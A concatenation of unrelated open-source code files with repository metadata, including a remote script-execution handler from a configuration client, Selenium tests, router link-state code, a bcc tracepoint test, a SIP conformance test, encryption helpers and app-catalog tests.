signal.signal(signal.SIGTERM, sHandler.handle)
cfg = config.initUp2dateConfig()
local_config.init('rhncfg-client', defaults=dict(cfg.items()))
tempfile.tempdir = local_config.get('script_tmp_dir')
logfile_name = local_config.get('script_log_file')
log_output = local_config.get('script_log_file_enable')
if log_output:
# If we're going to log, make sure we can create the logfile
_create_path(logfile_name)
if cache_only:
return (0, "no-ops for caching", {})
action_type = 'script.run'
if not _local_permission_check(action_type):
return _perm_error(action_type)
extras = {'output':''}
script = params.get('script')
if not script:
return (1, "No script to execute", {})
username = params.get('username')
groupname = params.get('groupname')
if not username:
return (1, "No username given to execute script as", {})
if not groupname:
return (1, "No groupname given to execute script as", {})
timeout = params.get('timeout')
if timeout:
try:
timeout = int(timeout)
except ValueError:
return (1, "Invalid timeout value", {})
else:
timeout = None
db_now = params.get('now')
if not db_now:
return (1, "'now' argument missing", {})
db_now = time.mktime(time.strptime(db_now, "%Y-%m-%d %H:%M:%S"))
now = time.time()
process_start = None
process_end = None
child_pid = None
# determine uid/ugid for script ownership, uid also used for setuid...
try:
user_record = pwd.getpwnam(username)
except KeyError:
return 1, "No such user %s" % username, extras
uid = user_record[2]
ugid = user_record[3]
# create the script on disk
try:
script_path = _create_script_file(script, uid=uid, gid=ugid)
except OSError:
e = sys.exc_info()[1]
return 1, "Problem creating script file: %s" % e, extras
# determine gid to run script as
try:
group_record = grp.getgrnam(groupname)
except KeyError:
return 1, "No such group %s" % groupname, extras
run_as_gid = group_record[2]
# create some pipes to communicate w/ the child process
(pipe_read, pipe_write) = os.pipe()
process_start = time.time()
child_pid = os.fork()
if not child_pid:
# Parent doesn't write to child, so close that part
os.close(pipe_read)
# Redirect both stdout and stderr to the pipe
os.dup2(pipe_write, sys.stdout.fileno())
os.dup2(pipe_write, sys.stderr.fileno())
|
        # Close unnecessary file descriptors (including pipe since it's duped)
for i in range(3, MAXFD):
try:
os.close(i)
except:
pass
# all scripts initial working directory will be /
# puts burden on script writer to ensure cwd is correct within the
# script
os.chdir('/')
# the child process gets the desired uid/gid
os.setgid(run_as_gid)
|
        groups=[g.gr_gid for g in grp.getgrall() if username in g.gr_mem or username in g.gr_name]
os.setgroups(groups)
os.setuid(uid)
# give this its own process group (which happens to be equal to its
# pid)
os.setpgrp()
# Finally, exec the script
try:
os.umask(int("022", 8))
os.execv(script_path, [script_path, ])
finally:
# This code can be reached only when script_path can not be
# executed as otherwise execv never returns.
# (The umask syscall always succeeds.)
os._exit(1)
# Parent doesn't write to child, so close that part
os.close(pipe_write)
output = None
timed_out = None
out_stream = tempfile.TemporaryFile()
while 1:
select_wait = None
if timeout:
elapsed = time.time() - process_start
if elapsed >= timeout:
timed_out = 1
# Send TERM to all processes in the child's process group
# Send KILL after that, just to make sure the child died
os.kill(-child_pid, signal.SIGTERM)
time.sleep(2)
os.kill(-child_pid, signal.SIGKILL)
break
select_wait = timeout - elapsed
# XXX try-except here for interrupted system calls
input_fds, output_fds, error_fds = select.select([pipe_read], [], [], select_wait)
if error_fds:
# when would this happen?
os.close(pipe_read)
return 1, "Fatal exceptional case", extras
if not (pipe_read in input_fds):
# Read timed out, should be caught in the next loop
continue
output = os.read(pipe_read, 4096)
if not output:
# End of file from the child
break
out_stream.write(output)
os.close(pipe_read)
# wait for the child to complete
(somepid, exit_status) = os.waitpid(child_pid, 0)
process_end = time.time()
# Copy the output from the temporary file
out_stream.seek(0, 0)
extras['output'] = out_stream.read()
out_stream.close(
|
Dev-Cloud-Platform/Dev-Cloud
|
dev_cloud/cc1/src/wi/tests/cm_networks_test.py
|
Python
|
apache-2.0
| 4,435 | 0.00203 |
# -*- coding: utf-8 -*-
# @COPYRIGHT_begin
#
# Copyright [2010-2014] Institute of Nuclear Physics PAN, Krakow, Poland
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
# @COPYRIGHT_end
# -*- coding: utf-8 -*-
"""@package src.wi.tests.cm_networks_test
@author Piotr Wójcik
@author Krzysztof Danielowski
@date 09.01.2013
"""
from wi.tests import WiTestCase
import unittest
class CMNetworksTests(WiTestCase, unittest.TestCase):
@staticmethod
def _test_add_pool(self):
driver = self.driver
self.base_url = self.TEST_SERVER
self.login_testuser(self.TEST_admin_cm)
self.login_cm_testuser()
driver.get(self.base_url + "/admin_cm/pools/")
self.wait_for_text("//table[@id='item-list']/tfoot/tr/td/ul/li/a", ["Add pool"])
driver.find_element_by_link_text("Add pool").click()
self.wait_for_text("//div[@id='dialog-div']/form/div/fieldset/div/span", ["Pool address"])
driver.find_element_by_id("id_address").clear()
driver.find_element_by_id("id_address").send_keys("10.10.127.0")
driver.find_element_by_id("id_mask").clear()
driver.find_element_by_id("id_mask").send_keys("24")
driver.find_element_by_css_selector("button.ok-button.mid_button").click()
self.wait_for_message(["You have successfully added a pool."])
driver.find_element_by_link_text("Logout from CM").click()
driver.find_element_by_link_text("Logout").click()
@staticmethod
def _test_unlock_pool(self):
|
        driver = self.driver
|
        self.base_url = self.TEST_SERVER
self.login_testuser(self.TEST_admin_cm)
self.login_cm_testuser()
driver.get(self.base_url + "/admin_cm/pools/")
self.wait_for_text("//table[@id='item-list']/tbody", ["10.10.127.0"])
self.menu_click("Address", "10.10.127.0", "Unlock")
self.wait_for_text("//div[@id='dialog-div']/p", ["Do you want to unlock pool"])
driver.find_element_by_css_selector("button.ok-button.mid_button").click()
self.wait_for_message(["You have successfully unlocked pool"])
driver.find_element_by_link_text("Logout from CM").click()
driver.find_element_by_link_text("Logout").click()
def _test_lock_pool(self):
driver = self.driver
self.base_url = self.TEST_SERVER
self.login_testuser(self.TEST_admin_cm)
self.login_cm_testuser()
driver.get(self.base_url + "/admin_cm/pools/")
self.wait_for_text("//table[@id='item-list']/tbody", ["10.10.127.0"])
self.menu_click("Address", "10.10.127.0", "Lock")
self.wait_for_text("//div[@id='dialog-div']/p", ["Do you want to lock pool"])
driver.find_element_by_css_selector("button.ok-button.mid_button").click()
self.wait_for_message(["You have successfully locked pool"])
driver.find_element_by_link_text("Logout from CM").click()
driver.find_element_by_link_text("Logout").click()
@staticmethod
def _test_delete_pool(self):
driver = self.driver
self.base_url = self.TEST_SERVER
self.login_testuser(self.TEST_admin_cm)
self.login_cm_testuser()
driver.get(self.base_url + "/admin_cm/pools/")
self.wait_for_text("//table[@id='item-list']/tbody", ["10.10.127.0"])
self.menu_click("Address", "10.10.127.0", "Delete")
self.wait_for_text("//div[@id='dialog-div']/p", ["Do you want to delete pool"])
driver.find_element_by_css_selector("button.ok-button.mid_button").click()
self.wait_for_message(["You have successfully deleted pool"])
driver.find_element_by_link_text("Logout from CM").click()
driver.find_element_by_link_text("Logout").click()
def test_1_simple(self):
self._test_add_pool(self)
self._test_lock_pool()
self._test_unlock_pool(self)
self._test_delete_pool(self)
|
michaelkuty/python-app-loader
|
tests/testapp1/urls.py
|
Python
|
bsd-3-clause
| 73 | 0 |
|
from app_loader import app_loader
|
urlpatterns = app_loader.urlpatterns
|
haystack/eyebrowse-server
|
common/management/commands/remove_duplicate_history.py
|
Python
|
mit
| 949 | 0 |
from django.core.management.base import NoArgsCommand
from django.contrib.auth.models import User
from api.models import EyeHistory
class Command(NoArgsCommand):
help = 'Detects and removes duplicated history entries'
def handle(self, **options):
self.stdout.write('Beginning update...\n')
users = User.objects.all()
for user in users:
self._delete_dup_history(user)
self.stdout.write('Update complete.\n')
def _delete_dup_history(self, user):
items = EyeHistory.objects.filter(user=user)
for item in items:
objs = EyeHistory.objects.filter(
user=user, url=item.url,
domain=item.domain, title=item.title,
total_time=item.total_time, src=item.src)
            if objs.count() > 1:
for obj in objs[1:]:
|
                    self.stdout.write('Deleting: %s\n' % item)
|
obj.delete()
|
ChugR/qpid-dispatch
|
python/qpid_dispatch_internal/router/link.py
|
Python
|
apache-2.0
| 3,006 | 0.002329 |
#
# Licensed to the Apache Software Foundation (ASF) under one
|
# or more contributor license agreements. See the NOTICE file
# distributed with this work for additional information
# regarding copyright ownership. The ASF licenses this file
# to you under the Apache License, Version 2.0 (the
# "License"); you may not use this file except in compliance
# with the License. You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
|
# Unless required by applicable law or agreed to in writing,
# software distributed under the License is distributed on an
# "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY
# KIND, either express or implied. See the License for the
# specific language governing permissions and limitations
# under the License.
#
from .data import MessageRA, MessageLSU, MessageLSR
from ..dispatch import LOG_TRACE
class LinkStateEngine:
"""
This module is responsible for running the Link State protocol.
"""
def __init__(self, container):
self.container = container
self.node_tracker = container.node_tracker
self.id = self.container.id
self.ra_interval_stable = self.container.config.raIntervalSeconds
self.ra_interval_flux = self.container.config.raIntervalFluxSeconds
self.last_ra_time = 0
self.mobile_seq = 0
def set_mobile_seq(self, mobile_seq):
self.mobile_seq = mobile_seq
def tick(self, now):
interval = self.ra_interval_stable
if self.node_tracker.in_flux_mode(now):
interval = self.ra_interval_flux
if now - self.last_ra_time >= interval:
self.send_ra(now)
def handle_ra(self, msg, now):
if msg.id == self.id:
return
self.node_tracker.ra_received(msg.id, msg.version, msg.ls_seq, msg.mobile_seq, msg.instance, now)
def handle_lsu(self, msg, now):
if msg.id == self.id:
return
self.node_tracker.link_state_received(msg.id, msg.version, msg.ls, msg.instance, now)
def handle_lsr(self, msg, now):
if msg.id == self.id:
return
self.node_tracker.router_learned(msg.id, msg.version)
my_ls = self.node_tracker.link_state
smsg = MessageLSU(None, self.id, my_ls.ls_seq, my_ls, self.container.instance)
self.container.send('amqp:/_topo/%s/%s/qdrouter' % (msg.area, msg.id), smsg)
self.container.log_ls(LOG_TRACE, "SENT: %r" % smsg)
def send_lsr(self, _id):
msg = MessageLSR(None, self.id)
self.container.send('amqp:/_topo/0/%s/qdrouter' % _id, msg)
self.container.log_ls(LOG_TRACE, "SENT: %r to: %s" % (msg, _id))
def send_ra(self, now):
self.last_ra_time = now
ls_seq = self.node_tracker.link_state.ls_seq
msg = MessageRA(None, self.id, ls_seq, self.mobile_seq, self.container.instance)
self.container.send('amqp:/_topo/0/all/qdrouter', msg)
self.container.log_ls(LOG_TRACE, "SENT: %r" % msg)
|
toomoresuch/pysonengine
|
parts/gaeunit/sample_app/model.py
|
Python
|
mit
| 92 | 0.021739 |
|
from google.appengine.ext import db
class MyEntity(db.Model):
    name = db.StringProperty()
|
|
shodoco/bcc
|
tests/python/test_tracepoint.py
|
Python
|
apache-2.0
| 2,128 | 0.00282 |
#!/usr/bin/env python
# Copyright (c) Sasha Goldshtein
# Licensed under the Apache License, Version 2.0 (the "License")
import bcc
import unittest
from time import sleep
import distutils.version
import os
import subprocess
def kernel_version_ge(major, minor):
# True if running kernel is >= X.Y
version = distutils.version.LooseVersion(os.uname()[2]).version
if version[0] > major:
return True
if version[0] < major:
|
        return False
if minor and version[1] < minor:
return False
return True
@unittest.skipUnless(kernel_version_ge(4,7), "requires kernel >= 4.7")
class TestTracepoint(unittest.TestCase):
def test_tracepoint(self):
text = """
|
        BPF_HASH(switches, u32, u64);
TRACEPOINT_PROBE(sched, sched_switch) {
u64 val = 0;
u32 pid = args->next_pid;
u64 *existing = switches.lookup_or_init(&pid, &val);
(*existing)++;
return 0;
}
"""
b = bcc.BPF(text=text)
sleep(1)
total_switches = 0
for k, v in b["switches"].items():
total_switches += v.value
self.assertNotEqual(0, total_switches)
@unittest.skipUnless(kernel_version_ge(4,7), "requires kernel >= 4.7")
class TestTracepointDataLoc(unittest.TestCase):
def test_tracepoint_data_loc(self):
text = """
struct value_t {
char filename[64];
};
BPF_HASH(execs, u32, struct value_t);
TRACEPOINT_PROBE(sched, sched_process_exec) {
struct value_t val = {0};
char fn[64];
u32 pid = args->pid;
struct value_t *existing = execs.lookup_or_init(&pid, &val);
TP_DATA_LOC_READ_CONST(fn, filename, 64);
__builtin_memcpy(existing->filename, fn, 64);
return 0;
}
"""
b = bcc.BPF(text=text)
subprocess.check_output(["/bin/ls"])
sleep(1)
self.assertTrue("/bin/ls" in [v.filename.decode()
for v in b["execs"].values()])
if __name__ == "__main__":
unittest.main()
|
ezigman/sftf
|
UserAgentBasicTestSuite/case207.py
|
Python
|
gpl-2.0
| 3,360 | 0.018155 |
#
# Copyright (C) 2004 SIPfoundry Inc.
# Licensed by SIPfoundry under the GPL license.
#
# Copyright (C) 2004 SIP Forum
# Licensed to SIPfoundry under a Contributor Agreement.
#
#
# This file is part of SIP Forum User Agent Basic Test Suite which
# belongs to the SIP Forum Test Framework.
#
# SIP Forum User Agent Basic Test Suite is free software; you can
# redistribute it and/or modify it under the terms of the GNU General
# Public License as published by the Free Software Foundation; either
# version 2 of the License, or (at your option) any later version.
#
# SIP Forum User Agent Basic Test Suite is distributed in the hope that it
# will be useful, but WITHOUT ANY WARRANTY; without even the implied
# warranty of MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with SIP Forum User Agent Basic Test Suite; if not, write to the
# Free Software Foundation, Inc., 59 Temple Place, Suite 330, Boston,
# MA 02111-1307 USA
#
# $Id: case207.py,v 1.2 2004/05/02 18:57:35 lando Exp $
#
from TestCase import TestCase
import NetworkEventHandler as NEH
import Log
class case207 (TestCase):
def config(self):
self.name = "Case 207"
self.description = "Content length larger than message"
self.isClient = True
self.transport = "UDP"
def run(self):
self.neh = NEH.NetworkEventHandler(self.transport)
|
        inv = self.createRequest("INVITE")
cl = inv.getParsedHeaderValue("Content-Length")
cl.length = 9999
inv.setHeaderValue("Content-Length", cl.create())
self.writeMessageToNetwork(self.neh, inv)
self.code = 0
while (self.code <= 200):
repl = self.readReplyFromNetwork(self.neh)
|
            if (repl is not None) and (repl.code > self.code):
self.code = repl.code
elif repl is None:
self.code = 999
if repl is None:
self.addResult(TestCase.TC_FAILED, "missing reply on request")
self.neh.closeSock()
def onDefaultCode(self, message):
if message.code > self.code:
self.code = message.code
if message.code >= 200:
if message.getParsedHeaderValue("CSeq").method == "INVITE":
Log.logDebug("case207: sending ACK for >= 200 reply", 3)
ack = self.createRequest("ACK", trans=message.transaction)
self.writeMessageToNetwork(self.neh, ack)
if message.code == 400:
self.addResult(TestCase.TC_PASSED, "INVITE rejected with 400")
elif message.code == 200:
if message.transaction.canceled:
Log.logDebug("case207: received 200 for CANCEL", 3)
else:
Log.logDebug("case207: sending BYE for accepted INVITE", 3)
bye = self.createRequest("BYE", dia=message.transaction.dialog)
self.writeMessageToNetwork(self.neh, bye)
rep = self.readReplyFromNetwork(self.neh)
if rep is None:
self.addResult(TestCase.TC_ERROR, "missing response on BYE")
elif message.code != 487:
self.addResult(TestCase.TC_FAILED, "INVITE rejected, but not with 400")
else:
self.addResult(TestCase.TC_FAILED, "INVITE accepted, not rejected with 400")
can = self.createRequest("CANCEL", trans=message.transaction)
message.transaction.canceled = True
self.writeMessageToNetwork(self.neh, can)
canrepl = self.readReplyFromNetwork(self.neh)
if canrepl is None:
self.addResult(TestCase.TC_ERROR, "missing 200 on CANCEL")
|
Leits/openprocurement.api.encryprion
|
openprocurement/api/encryprion/utils.py
|
Python
|
apache-2.0
| 1,144 | 0 |
import libnacl.secret
import libnacl.utils
|
from StringIO import StringIO
from .response import FileObjResponse
from pyramid.httpexceptions import HTTPBadRequest
def generate_secret_key():
return libnacl.utils.salsa_key().encode('hex')
|
def encrypt_file(key, fileobj, nonce=None):
if nonce is None:
nonce = libnacl.utils.rand_nonce()
box = libnacl.secret.SecretBox(key.decode('hex'))
encrypted = box.encrypt(fileobj.read(), nonce)
return StringIO(encrypted)
def decrypt_file(key, fileobj):
box = libnacl.secret.SecretBox(key.decode('hex'))
decrypted = box.decrypt(fileobj.read())
return StringIO(decrypted)
def validate_key(view_callable):
def inner(context, request):
key = request.params.get('key')
if key is None:
raise HTTPBadRequest('Key missed.')
if len(key) != 64:
raise HTTPBadRequest('The key must be exactly 32 bytes long.')
try:
key.decode('hex')
except TypeError:
raise HTTPBadRequest('Invalid key: Non-hexadecimal digit found.')
return view_callable(context, request)
return inner
|
pvarenik/PyCourses
|
allure-python-master/tests/test_attach.py
|
Python
|
gpl-2.0
| 2,550 | 0.002402 |
# encoding: utf-8
'''
Tests for various attachment thingies
Created on Oct 21, 2013
@author: pupssman
'''
import pytest
from hamcrest import has_entries, assert_that, is_, contains, has_property
from allure.constants import AttachmentType
from allure.utils import all_of
@pytest.mark.parametrize('package', ['pytest.allure', 'allure'])
def test_smoke(report_for, package):
report = report_for("""
import pytest
import allure
def test_x():
%s.attach('Foo', 'Bar')
""" % package)
assert_that(report.findall('test-cases/test-case/attachments/attachment'), contains(has_property('attrib', has_entries(title='Foo'))))
@pytest.mark.parametrize('a_type', map(lambda x: x[0], all_of(AttachmentType)))
def test_attach_types(report_for, a_type):
report = report_for("""
import allure as A
def test_x():
A.attach('Foo', 'Bar', A.attach_type.%s)
""" % a_type)
assert_that(report.find('.//attachment').attrib, has_entries(title='Foo', type=getattr(AttachmentType, a_type).mime_type))
class TestContents:
@pytest.fixture
def attach_contents(self, report_for, reportdir):
"""
Fixture that returns contents of the attachment file for given attach body
"""
def impl(body):
report = report_for("""
from pytest import allure as A
def test_x():
A.attach('Foo', %s, A.attach_type.TEXT)
""" % repr(body))
filename = report.find('.//attachment').get('source')
return reportdir.join(filename).read('rb')
return impl
def test_ascii(self, attach_contents):
assert_that(attach_contents('foo\nbar\tbaz'), is_(b'foo\nbar\tbaz'))
def test_unicode(self, attach_contents):
|
        assert_that(attach_contents(u'ололо пыщьпыщь').decode('utf-8'), is_(u'ололо пыщьпыщь'))
def test_broken_unicode(self, attach_contents):
assert_that(attach_contents(u'ололо пыщьпыщь'.encode('cp1251')), is_(u'ололо пыщьпыщь'.encode('cp1251')))
|
def test_attach_in_fixture_teardown(report_for):
"""
Check that calling ``pytest.allure.attach`` in fixture teardown works and attaches it there.
"""
report = report_for("""
import pytest
@pytest.yield_fixture(scope='function')
def myfix():
yield
pytest.allure.attach('Foo', 'Bar')
def test_x(myfix):
assert True
""")
assert_that(report.find('.//attachment').attrib, has_entries(title='Foo'))
|
the-zebulan/CodeWars
|
katas/beta/how_sexy_is_your_name.py
|
Python
|
mit
| 566 | 0 |
|
SCORES = {'A': 100, 'B': 14, 'C': 9, 'D': 28, 'E': 145, 'F': 12, 'G': 3,
'H': 10, 'I': 200, 'J': 100, 'K': 114, 'L': 100, 'M': 25,
'N': 450, 'O': 80, 'P': 2, 'Q': 12, 'R': 400, 'S': 113, 'T': 405,
|
          'U': 11, 'V': 10, 'W': 10, 'X': 3, 'Y': 210, 'Z': 23}
def sexy_name(name):
name_score = sum(SCORES.get(a, 0) for a in name.upper())
if name_score >= 600:
return 'THE ULTIMATE SEXIEST'
elif name_score >= 301:
return 'VERY SEXY'
elif name_score >= 60:
return 'PRETTY SEXY'
return 'NOT TOO SEXY'
|
aaivazis/nautilus
|
tests/services/test_service.py
|
Python
|
mit
| 2,991 | 0.003678 |
# external imports
import unittest
# local imports
import nautilus
from nautilus.api.endpoints import GraphQLRequestHandler
from ..util import Mock
class TestUtil(unittest.TestCase):
def setUp(self):
# create a service without an explict name
class MyService(nautilus.Service): pass
# save the service record to the test suite
self.service = MyService
def test_has_default_name(self):
# make sure the name matches
assert self.service.name == 'myService', (
"Service did not have the correct name."
)
def test_default_name_can_have_numbers(self):
# create a service without an explict name
class TestService1(nautilus.Service): pass
# make sure the name is what we expect
assert TestService1.name == 'testService1', (
"Service did not have the correct name with number."
)
def test_can_accept_name(self):
class MyService(nautilus.Service):
name = 'foo'
assert MyService.name == 'foo', (
"Service could not recieve custom name."
)
def test_can_initialize_with_schema(self):
# create a mock schema
schema = Mock()
# make sure the internal schema is what we gave it
assert self.service(schema=schema).schema == schema, (
"Service could not be initialized with a specific schema"
)
def test_can_accept_config(self):
# create a config object
config = nautilus.Config(foo='bar')
# make sure the config is what we gave it
assert self.service(config=config).config == config, (
"Service could not be initialized with a specific config."
)
def test_can_merge_config_from_init(self):
# the config of the base class
base_config = nautilus.Config(foo='bar')
# the config to initialize with
init_config = nautilus.Config(foo='baz', wakka='flokka')
class MyConfiguredService(nautilus.Service):
config = base_config
# the mix of the two config
mix_config = base_config.copy()
mix_config.update(init_config)
assert MyConfiguredService(config=init_config).config == mix_config, (
"Service could not mix the initialized config onto the base one."
)
def test_has_request_handler(self):
# check the value of the internal attribute
assert issubclass(self.service().api_request_handler_class, GraphQLRequestHandler), (
"APIGateway did not have the
|
right request handler class"
)
def test_can_summarize(self):
# the target summary
target = {
'name': 'myService',
}
# summarize the service
summarized = self.service().summarize()
|
        # make sure the names match up
assert target['name'] == summarized['name'], (
"Summarzied service did not have the right name."
)
|
nickdrozd/ecio-lisp
|
fileio.py
|
Python
|
mit
| 581 | 0.003442 |
import json
from stats import read_stats
@read_stats
def read_file(file_name, default='"?"'):
try:
|
file = open(file_name, 'r')
except FileNotFoundError:
print('Creating file {}'.format(file_name))
file = open(file_name, 'w+')
file.write(default)
contents = json.loads(file.read())
file.close()
return contents
def write_file(file_name, data, indent=4):
|
    with open(file_name, 'w+') as file:
file.write(
json.dumps(
data,
sort_keys=True,
indent=indent))
|
YunoHost/moulinette-yunohost
|
src/yunohost/tests/test_appscatalog.py
|
Python
|
agpl-3.0
| 9,247 | 0.001406 |
import os
import pytest
import requests
import requests_mock
import glob
import shutil
from moulinette import m18n
from moulinette.utils.filesystem import read_json, write_to_json, write_to_yaml
from yunohost.utils.error import YunohostError
from yunohost.app import (
_initialize_apps_catalog_system,
_read_apps_catalog_list,
_update_apps_catalog,
_actual_apps_catalog_api_url,
_load_apps_catalog,
app_catalog,
logger,
APPS_CATALOG_CACHE,
APPS_CATALOG_CONF,
APPS_CATALOG_API_VERSION,
APPS_CATALOG_DEFAULT_URL,
)
APPS_CATALOG_DEFAULT_URL_FULL = _actual_apps_catalog_api_url(APPS_CATALOG_DEFAULT_URL)
DUMMY_APP_CATALOG = """{
"apps": {
"foo": {"id": "foo", "level": 4, "category": "yolo", "manifest":{"description": "Foo"}},
"bar": {"id": "bar", "level": 7, "category": "swag", "manifest":{"description": "Bar"}}
},
"categories": [
{"id": "yolo", "description": "YoLo", "title": {"en": "Yolo"}},
{"id": "swag", "description": "sWaG", "title": {"en": "Swag"}}
]
}
"""
class AnyStringWith(str):
def __eq__(self, other):
return self in other
def setup_function(function):
# Clear apps catalog cache
shutil.rmtree(APPS_CATALOG_CACHE, ignore_errors=True)
# Clear apps_catalog conf
if os.path.exists(APPS_CATALOG_CONF):
os.remove(APPS_CATALOG_CONF)
def teardown_function(function):
# Clear apps catalog cache
# Otherwise when using apps stuff after running the test,
# we'll still have the dummy unusable list
shutil.rmtree(APPS_CATALOG_CACHE, ignore_errors=True)
#
# ################################################
#
def test_apps_catalog_init(mocker):
# Cache is empty
assert not glob.glob(APPS_CATALOG_CACHE + "/*")
# Conf doesn't exist yet
assert not os.path.exists(APPS_CATALOG_CONF)
# Initialize ...
mocker.spy(m18n, "n")
_initialize_apps_catalog_system()
m18n.n.assert_any_call("apps_catalog_init_success")
# And a conf with at least one list
assert os.path.exists(APPS_CATALOG_CONF)
apps_catalog_list = _read_apps_catalog_list()
assert len(apps_catalog_list)
# Cache is expected to still be empty though
# (if we did update the apps_catalog during init,
# we couldn't differentiate easily exceptions
# related to lack of network connectivity)
assert not glob.glob(APPS_CATALOG_CACHE + "/*")
def test_apps_catalog_emptylist():
# Initialize ...
_initialize_apps_catalog_system()
# Let's imagine somebody removed the default apps catalog because uh idk they dont want to use our default apps catalog
os.system("rm %s" % APPS_CATALOG_CONF)
os.system("touch %s" % APPS_CATALOG_CONF)
apps_catalog_list = _read_apps_catalog_list()
assert not len(apps_catalog_list)
def test_apps_catalog_update_nominal(mocker):
# Initialize ...
_initialize_apps_catalog_system()
# Cache is empty
assert not glob.glob(APPS_CATALOG_CACHE + "/*")
# Update
with requests_mock.Mocker() as m:
# Mock the server response with a dummy apps catalog
m.register_uri("GET", APPS_CATALOG_DEFAULT_URL_FULL, text=DUMMY_APP_CATALOG)
mocker.spy(m18n, "n")
_update_apps_catalog()
m18n.n.assert_any_call("apps_catalog_updating")
m18n.n.assert_any_call("apps_catalog_update_success")
# Cache shouldn't be empty anymore empty
assert glob.glob(APPS_CATALOG_CACHE + "/*")
# And if we load the catalog, we sould find
# - foo and bar as apps (unordered),
# - yolo and swag as categories (ordered)
catalog = app_catalog(with_categories=True)
assert "apps" in catalog
assert set(catalog["apps"].keys()) == set(["foo", "bar"])
assert "categories" in catalog
assert [c["id"] for c in catalog["categories"]] == ["yolo", "swag"]
def test_apps_catalog_update_404(mocker):
# Initialize ...
_initialize_apps_catalog_system()
with requests_mock.Mocker() as m:
# 404 error
m.register_uri("GET", APPS_CATALOG_DEFAULT_URL_FULL, status_code=404)
with pytest.raises(YunohostError):
mocker.spy(m18n, "n")
_update_apps_catalog()
m18n.n.assert_any_call("apps_catalog_failed_to_download")
def test_apps_catalog_update_timeout(mocker):
# Initialize ...
_initialize_apps_catalog_system()
with requests_mock.Mocker() as m:
# Timeout
m.register_uri(
"GET", APPS_CATALOG_DEFAULT_URL_FULL, exc=requests.exceptions.ConnectTimeout
)
with pytest.raises(YunohostError):
mocker.spy(m18n, "n")
_update_apps_catalog()
m18n.n.assert_any_call("apps_catalog_failed_to_download")
def test_apps_catalog_update_sslerror(mocker):
# Initialize ...
_initialize_apps_catalog_system()
with requests_mock.Mocker() as m:
# SSL error
m.register_uri(
"GET", APPS_CATALOG_DEFAULT_URL_FULL, exc=requests.exceptions.SSLError
)
with pytest.raises(YunohostError):
mocker.spy(m18n, "n")
_update_apps_catalog()
m18n.n.assert_any_call("apps_catalog_failed_to_download")
def test_apps_catalog_update_corrupted(mocker):
# Initialize ...
_initialize_apps_catalog_system()
with requests_mock.Mocker() as m:
# Corrupted json
m.register_uri(
"GET", APPS_CATALOG_DEFAULT_URL_FULL, text=DUMMY_APP_CATALOG[:-2]
)
with pytest.raises(YunohostError):
mocker.spy(m18n, "n")
_update_apps_catalog()
m18n.n.assert_any_call("apps_catalog_failed_to_download")
def test_apps_catalog_load_with_empty_cache(mocker):
# Initialize ...
_initialize_apps_catalog_system()
# Cache is empty
assert not glob.glob(APPS_CATALOG_CACHE + "/*")
# Update
with requests_mock.Mocker() as m:
# Mock the server response with a dummy apps catalog
m.register_uri("GET", APPS_CATALOG_DEFAULT_URL_FULL, text=DUMMY_APP_CATALOG)
# Try to load the apps catalog
# This should implicitly trigger an update in the background
mocker.spy(m18n, "n")
app_dict = _load_apps_catalog()["apps"]
m18n.n.assert_any_call("apps_catalog_obsolete_cache")
m18n.n.assert_any_call("apps_catalog_update_success")
# Cache shouldn't be empty anymore empty
assert glob.glob(APPS_CATALOG_CACHE + "/*")
|
assert "foo" in app_dict.keys()
assert "bar" in app_dict.keys()
def test_apps_catalog_load_with_conflicts_between_lists(mocker):
# Initialize ...
_initialize_apps_catalog_system()
conf = [
{"id": "default", "url": APPS_CATALOG_DEFAULT_URL},
{
"id": "default2",
"url": APPS_CATALOG_DEFAULT_URL.replace("yunohost.org", "yolohost.org"),
},
]
|
write_to_yaml(APPS_CATALOG_CONF, conf)
# Update
with requests_mock.Mocker() as m:
# Mock the server response with a dummy apps catalog
# + the same apps catalog for the second list
m.register_uri("GET", APPS_CATALOG_DEFAULT_URL_FULL, text=DUMMY_APP_CATALOG)
m.register_uri(
"GET",
APPS_CATALOG_DEFAULT_URL_FULL.replace("yunohost.org", "yolohost.org"),
text=DUMMY_APP_CATALOG,
)
# Try to load the apps catalog
# This should implicitly trigger an update in the background
mocker.spy(logger, "warning")
app_dict = _load_apps_catalog()["apps"]
logger.warning.assert_any_call(AnyStringWith("Duplicate"))
# Cache shouldn't be empty anymore empty
assert glob.glob(APPS_CATALOG_CACHE + "/*")
assert "foo" in app_dict.keys()
assert "bar" in app_dict.keys()
def test_apps_catalog_load_with_oudated_api_version(mocker):
# Initialize ...
_initialize_apps_catalog_system()
# Update
with requests_mock.Mocker() as m:
mocker.spy(m18n, "n")
m.register_uri("GET", APPS_CATALOG_DEFAULT_URL_FULL, text=DUMMY_APP_CATALOG)
_update_apps_catalog()
# Cache shouldn
|
Jacques-Florence/schedSim
|
src/analysis/reward.py
|
Python
|
bsd-3-clause
| 847 | 0.022432 |
#!/usr/bin/env python
import matplotlib.pyplot as plt
import sys
import numpy
from math import floor
def movingAverage(x, N):
cumsum = numpy.cumsum(numpy.insert(x, 0, 0))
return (cumsum[N:] - cumsum[:-N])/N
filename = "reports/configuration.confrewardRecordReport.txt"
if (len(sys.argv) > 1):
filename = sys.argv[1]
with open(filename) as f:
print f.readline()
time = []
temp = []
avg = []
for line in f:
|
        entry = line.split(":")
        time.append(float(entry[0]))
|
        temp.append(float(entry[1]))
windowSize = 100
avg = [0] * (windowSize - 1)
avg = avg + list( movingAverage(temp, windowSize))
ratio = 0.999
avg = avg[int(floor(len(avg )*ratio)): len(avg )-1]
time = time[int(floor(len(time)*ratio)): len(time)-1]
temp = temp[int(floor(len(temp)*ratio)): len(temp)-1]
plt.plot(time, temp, 'r-')
plt.plot(time, avg, 'ro')
plt.show()
|
akarol/cfme_tests
|
cfme/cloud/security_groups.py
|
Python
|
gpl-2.0
| 8,515 | 0.001292 |
# -*- coding: utf-8 -*-
import attr
from navmazing import NavigateToAttribute, NavigateToSibling
from widgetastic.widget import View, Select
from widgetastic_manageiq import (
